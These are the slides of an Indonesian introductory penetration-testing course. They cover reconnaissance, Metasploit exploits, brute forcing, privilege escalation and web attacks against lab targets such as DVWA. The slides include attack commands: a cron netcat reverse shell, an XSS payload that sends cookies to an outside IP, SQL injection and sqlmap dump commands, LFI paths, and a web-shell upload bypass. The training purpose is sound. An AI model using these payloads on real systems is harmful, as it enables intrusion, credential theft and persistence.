Penetration Testing IDN
Penetration Testing IDN
Fundamental
Penetration Testing
Aditya Firman Nugroho
,Pentest+,EjptV2,CNSP,Security+
www.idn.id 2
Introduction Trainer
IDN.ID
Contact Information
Email : adityafirmannn21@gmail.com
Linkedin =linkedin/aditya-firman-Nugroho
Nomor : 0812-1471-7312
Certified : MTCSE, Pentest+,Security+, Ejptv2,
NSE4,CNSP
www.idn.id 3
Modul 1
Setup Environment
Setup Basic Environment
IDN.ID
www.idn.id 5
Setup VMware
IDN.ID
www.idn.id 6
Kali Linux Setup
IDN.ID
www.idn.id 7
Kali Linux Setup
IDN.ID
www.idn.id 8
Setup Metasploitable2
IDN.ID
www.idn.id 9
Modul 2
Fundamental IT
OSI Layer
IDN.ID
www.idn.id 11
TCP & UDP
IDN.ID
• TCP
• Reliable Data
• Three-Way Handshake
• Chatting, HTTPS
• UDP
• Unreliable Data
• More Fast
• Streaming Youtube
www.idn.id 12
Port & Service
IDN.ID
www.idn.id 13
Linux File system hierarchy
IDN.ID
www.idn.id 14
File Permision
IDN.ID
www.idn.id 15
Command Linux
IDN.ID
www.idn.id 16
Modul 3
Introduction Offensive
Security
Kali Linux
IDN.ID
www.idn.id 18
CIA Triad
IDN.ID
www.idn.id 19
Pentesting Process
IDN.ID
www.idn.id 20
Vulnerability Assessment & Penetration Testing
IDN.ID
Vulnerability Penetration
Assessment Testing
www.idn.id 21
Knowledge strategy
IDN.ID
www.idn.id 22
Assessment Types
IDN.ID
www.idn.id 23
Methodology
IDN.ID
[IDN-Router]
www.idn.id 24
OWASP TOP 10
IDN.ID
OWASP Top 10 adalah standar keamanan yang bisa dipakai secara umum untuk melakukan
checking parameter security. menampilkan yang paling critical dan resiko tertinggi untuk web
application
www.idn.id 25
Modul 4
Information
Gathering
Information Gathering
IDN.ID
www.idn.id 27
Passive Information Gathering
IDN.ID
www.idn.id 28
Google Hacking Databse
IDN.ID
https://www.exploit-db.com/google-hacking-database
www.idn.id 29
LA
B
Using Google Dorking
IDN.ID
filetype:pdf site:idn.id
www.idn.id 30
Real Case With Google Dorking
IDN.ID
https://royzsec.medium.com/how-i-hacked-nasa-via-google-dorking-6d8c03d0675a
www.idn.id 31
Cheat Sheat google dork
IDN.ID
www.idn.id 32
Google Hacking Databse
IDN.ID
TUGAS :
www.idn.id 33
OSINT Framework
IDN.ID
https://osintframework.com/
www.idn.id 34
LA
B
Shodan
IDN.ID
www.idn.id 35
LA
B
Shodan
IDN.ID
TUGAS :
1. Port
2. Service
3. Vulnerability
www.idn.id 36
LA
B
DNSdumpster
IDN.ID
www.idn.id 37
Tools Automation
theHarvester Recon-ng
www.idn.id 38
LA
B
theHarvester
IDN.ID
theHarvester -d <Target>
www.idn.id 39
LA
B
theHarvester
IDN.ID
Usage :
nano /etc/theHarvester/api-keys.yaml
< menambahkan api keys >
www.idn.id 40
Active Information Gathering
IDN.ID
www.idn.id 41
LA
B
Ping Swep
IDN.ID
www.idn.id 42
LA
B
Port Scanner With Bash + Nc
IDN.ID
www.idn.id 43
NMAP
IDN.ID
Usage :
#nmap <HOST>
#nmap –A –Sv <HOST>
www.idn.id 44
Cheatshet NMAP
IDN.ID
www.idn.id 45
Nmap Script Engine
IDN.ID
www.idn.id 46
LA
B
NMAP
IDN.ID
www.idn.id 47
Searchsploit & Exploit-DB
IDN.ID
www.idn.id 48
LA
B
Peak Tugas
IDN.ID
www.idn.id 49
Nessus
IDN.ID
www.idn.id 50
LA
B
Nessus
IDN.ID
www.idn.id 51
52
CVE & CWE
IDN.ID
www.idn.id 53
Web Application Enumeration
IDN.ID
www.idn.id 54
LA
B
Web Technology
IDN.ID
wappalyzer whatweb
www.idn.id 55
LA
B
Directory/Subdomain
IDN.ID
ffuf dirb
www.idn.id 56
LA
B
Directory/Subdomain
IDN.ID
Tugas :
www.idn.id 57
Metasploit Framework
IDN.ID
Usage :
auxiliary/scanner/http/dir_listing
auxiliary/scanner/http/files_dir
auxiliary/scanner/http/robots.txt
auxiliary/scanner/http/http-version
www.idn.id 58
LA
B
Scanning With CMS
IDN.ID
wpscan
joomscan
www.idn.id 59
LA
B
Scanning With CMS
IDN.ID
Usage :
www.idn.id 60
LA
B
Scanning With CMS
IDN.ID
TUGAS :
1. Silahkan cari user dari website target
wpscan
www.idn.id 61
Modul 5
Gaining Access
Vulnerability
IDN.ID
www.idn.id 63
LA
B
FTP Misconfiguration : Login Anonymous
IDN.ID
www.idn.id 64
LA
B
FTP Backdoor : vsftpd 2.3.4
IDN.ID
Vsftpd 2.3.4 FTP Backdoor adalah sebuah backdoor yang dipasang oleh APT
pada aplikasi FTP. Yang bisa Membuat kita mendapatkan akses root hanya
dengan menggunakan satu tools yaitu metasploitable2
• Msfconsole
• Use / exploit/unix/ftp/vsftpd_234_backdoor
• Set RHOST IP-TARGET
• run
www.idn.id 65
LA
B
SMB : EternalBlue
IDN.ID
Threat Actors melakukan serangan yang kita sudah tau Bernama WannaCry
Ransomware yang mengakibatkan banyak Microsoft Windows system yang
terkena ransomware ini. Ransomware ini mengambil keuntungan dari SMBv1
yang bisa mengakibatkan RCE ( Remote Code Execution )
• Msfconsole
• Use auxiliary/scanner/smb/smb_ms17_010
• Set RHOSTS IP-TARGET
• RUN
• Use exploit/windows/smb/ms_17_010_eternalbue
• Set RHOST IP-TARGET & Set LHOSTS IP-KALI-LINUX
• Exploit
www.idn.id 66
Password Attacks
IDN.ID
Ada beberapa cara melakukan password seperti dibawah, goals dari serangan
ini mendapatkan akses terhadap sistem, enumeration password & username
atau mencoba melakukan kombinasi untuk masuk kedalam system
• Brute Force
• Dictionary attack
• Password Cracking
www.idn.id 67
LA
B
Wordlist Generator
IDN.ID
www.idn.id 68
LA
B
Wordlist Generator
IDN.ID
Command Crunch
crunch 4 5 abcdefgh > wordlist.txt
dpkg /usr/share/wordlists/rockyou.txt
www.idn.id 69
LA
B
SSH Brute Force : Hydra
IDN.ID
Hydra adalah tools brute force password attack. Bisa Service network
FTP,SSH,SMB dan masih banyak lagi juga bisa untuk ke web app
• hydra -l <user> -P <wordlist-password> <target> <method>
usage :
www.idn.id 70
LA
B
Hydra login brute force
IDN.ID
Format
<URL>:<FORM PARAMETER>:<CONDITION
STRING>[:<OPTIONAL><:OPTIONAL>
www.idn.id 71
LA
B
Burp Suite Brute Force
IDN.ID
www.idn.id 72
LA
B
Burp Suite Brute Force
IDN.ID
Edit Payload
www.idn.id 73
LA
B
SSH Brute Force : Hydra
IDN.ID
Tugas :
1. Brute force login page online !
2. Brute force ssh !
www.idn.id 74
LA
B
Login Page Brute Force : WPSCAN
IDN.ID
www.idn.id 75
LA
B
Login Page Brute Force : WPSCAN
IDN.ID
Tugas :
www.idn.id 76
LA
B
Using John the ripper
IDN.ID
www.idn.id 77
LA
B
Using John the ripper
IDN.ID
Tugas :
Crack password yang ada pada link
s.id/B-Pentest
1. Admin
2. Guest
3. Administrator
www.idn.id 78
Metasploit Framework
IDN.ID
• auxiliary/scanner/http/wordpress_login_enum
• auxiliary/scanner/ssh/ssh_login
• auxiliary/scanner/smb/smb_login
www.idn.id 79
Modul 6
Post-Exploitation
Privilage Escalation
IDN.ID
www.idn.id 81
LA
B
Weak Configuration
IDN.ID
www.idn.id 82
LA
B
SUID Exploit
IDN.ID
Usage :
Find / -type f –perm -4001 –exec ls –h {} \; 2>/dev/null
Sudo -l
Program bin
/usr/bin/find
/usr/bin/man
www.idn.id 83
LA
B
Vulnerability
IDN.ID
www.idn.id 84
LA
B
Dirty Cow (CVE-2016-5195 )
IDN.ID
Dirty-cow
1. Upload tools enumeration
• Linpeas
• linux-exploit-suggester.sh
2. Exploit with script
Usage :
# file upload with python3 or netcat
# chmod +x tools
# ./tools
www.idn.id 85
LA
B
Dirty Cow (CVE-2016-5195 )
IDN.ID
Dirty-cow
1. upload linpeas.sh
2. gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w
3. passwd or id
www.idn.id 86
Persistence
IDN.ID
www.idn.id 87
LA
B
Bind Shell vs Reverse Shell
IDN.ID
www.idn.id 88
LA
B
Netcat
IDN.ID
www.idn.id 89
LA
B
Revershell-Generator
IDN.ID
www.idn.id 90
LA
B
Cronjob
IDN.ID
Cronjob job scheduling utility yang bisa melakukan schedule yang berjalan di
background biasanya itu applikasi ataupun script. Nah dari sini kita bisa
menambahkan script reverse shell agar bisa connect
1. Crontab –e
2. * * * * * nc –nv IP-KALI PORT –e /bin/bash
3. Setelah melakukan crontab Kembali ke kali linux dan setting listener NC
www.idn.id 91
LA
B
SSH-keys
IDN.ID
SSH-Keys kita bisa masuk tanpa harus memasukan sebuah password pada
linux dengan ssh keys :
1. SSH-Keygens, create keys kali linux
2. Copy id_rsa.pub, arahkan ke authorized_keys pada target
3. Lakukan connect ssh
www.idn.id 92
Metasploit Framework
IDN.ID
#Usage :
se exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
…..
exploit
ps | <process>
kill <pid>
www.idn.id 93
Covering Tracks
IDN.ID
www.idn.id 94
Web Exploit
IDN.ID
www.idn.id 95
Directory Traversal
IDN.ID
www.idn.id 96
LA
B
Local File Inclusion
IDN.ID
../../../etc/passwd
www.idn.id 97
LA
B
Remote File Inclusion
IDN.ID
Kita akan melakukan Remote File Inclusion, pertama edit dulu allow_url pada
/etc/php5/cgi/php.ini dan restart apache server systemctl restart sshd
www.idn.id 98
LA
B
Remote File Inclusion
IDN.ID
Pertama kita akan Membuat backdoor, yang akan dipanggil disini kita
menggunakan php-reverse-shell.php file php yang sudah ada built-in dari
kali-linux
IP-KALI LINUX
PORT
www.idn.id 99
LA
B
Remote File Inclusion
IDN.ID
Reverse
shell
www.idn.id 100
XSS ( Stored & Reflected )
IDN.ID
Cara kerja XSS memanipulasi script agar memunculkan kelemahan di sisi web
application menggunakan malicious script. XSS ini mengijinkan attacker menjadi
seseorang yang teregister di web application sehingga bisa melakukan hal-hal
yang bisa dilakukan orang tersebut.
• Reflected XSS
Dimana malicious script datang dari request HTTP
• Stored XSS
Dimana malicious script data dari website database
www.idn.id 101
LA
B
XSS Stored DVWA
IDN.ID
Kita akan mencoba melakukan PoC pada DVWA ini, dengan cara melakukan
injection alert () dengan command ini akan menunjukan apakah form bisa di
injection XSS jika muncul gambar seperti ini maka form tersebut memiliki
kelemahan XSS
www.idn.id 102
LA
B
XSS Reflected DVWA
IDN.ID
Kita akan mencoba melakukan PoC pada DVWA ini, dengan cara melakukan
injection alert () dengan command ini akan menunjukan apakah form bisa di
injection XSS jika muncul gambar seperti ini maka form tersebut memiliki
kelemahan XSS
No input parameter
www.idn.id 103
LA
B
XSS Stealing Session
IDN.ID
Mencoba untuk mencuri cookies, saat target melakukan request pada website
yang sudah kita pasang Malicious Script
<script>new
Image().src="http://192.168.43
.147:8888/bogus.php?output=
"+document.cookie;</script>
www.idn.id 104
SQL Injection
IDN.ID
Dilihat dari application SQL tidak menjalankan sanitasi parameter, jadi kita bisa
coba melakukan injection code
www.idn.id 105
SQL Injection
IDN.ID
‘or
‘1’=‘1
www.idn.id 106
LA
B
SQL Injection DVWA
IDN.ID
www.idn.id 107
LA
B
SQL Injection Manual
IDN.ID
www.idn.id 108
SQL Injection with SQLMAP
IDN.ID
1. Target http://testphp.vulnweb.com/listproducts.php?cat=1
2. Jalankan tools sqlmap dengan command
sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –dbs
3. Terlihat beberapa database, explore database “acuart” dengan command
sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D acuart –tables
Terlihat muncul beberapa informasi, yang paling menarik adalah informasi dari
“users”, exploit menggunakan tools sqlmap
4. Lakukan lah command sqlmap –u
“http://testphp.vulnweb.com/listproducts.php?cat=1” -D acuart –T users –dump
www.idn.id 109
Upload File
IDN.ID
Upload file pada DVWA, kita akan mengupload sebuah shell backdoor untuk
menampilkan semua directory dan files
• Git clone https://github.com/aqhmal/Simple-PHP-Web-Backdoor
• Masukan pada file upload DVWA
www.idn.id 110
LA
B
Upload File with Burp Suite
IDN.ID
Menggunakan burp suite untuk melakukan manipulasi pada file yang diupload
• Jalankan Burp Suite
• Download certificate Burp http://burp pasangkan pada certificate search
engine
• Masuk ke DVWA Upload menu, upload file shell.php.jpeg ( ubah nama pada
file tersebut )
• Intercept data yang dikirimkan ganti shell.php.jpeg menjadi shell.php
www.idn.id 111
LA
B
Upload File with Burp Suite
IDN.ID
Dashboar
d
Wireshark
Turn ON
www.idn.id 112
LA
B
Upload File with Burp Suite
IDN.ID
Dowload CA
Masukan CA
www.idn.id 113
LA
B
Upload File with Burp Suite
IDN.ID
www.idn.id 114
LA
B
Upload File with Burp Suite
IDN.ID
Rename file
www.idn.id 115
Modul 7
Reporting
Reporting
IDN.ID
www.idn.id 117
LA
B
Nmap output html
IDN.ID
www.idn.id 118
LA
B
Nmap output html
IDN.ID
www.idn.id 119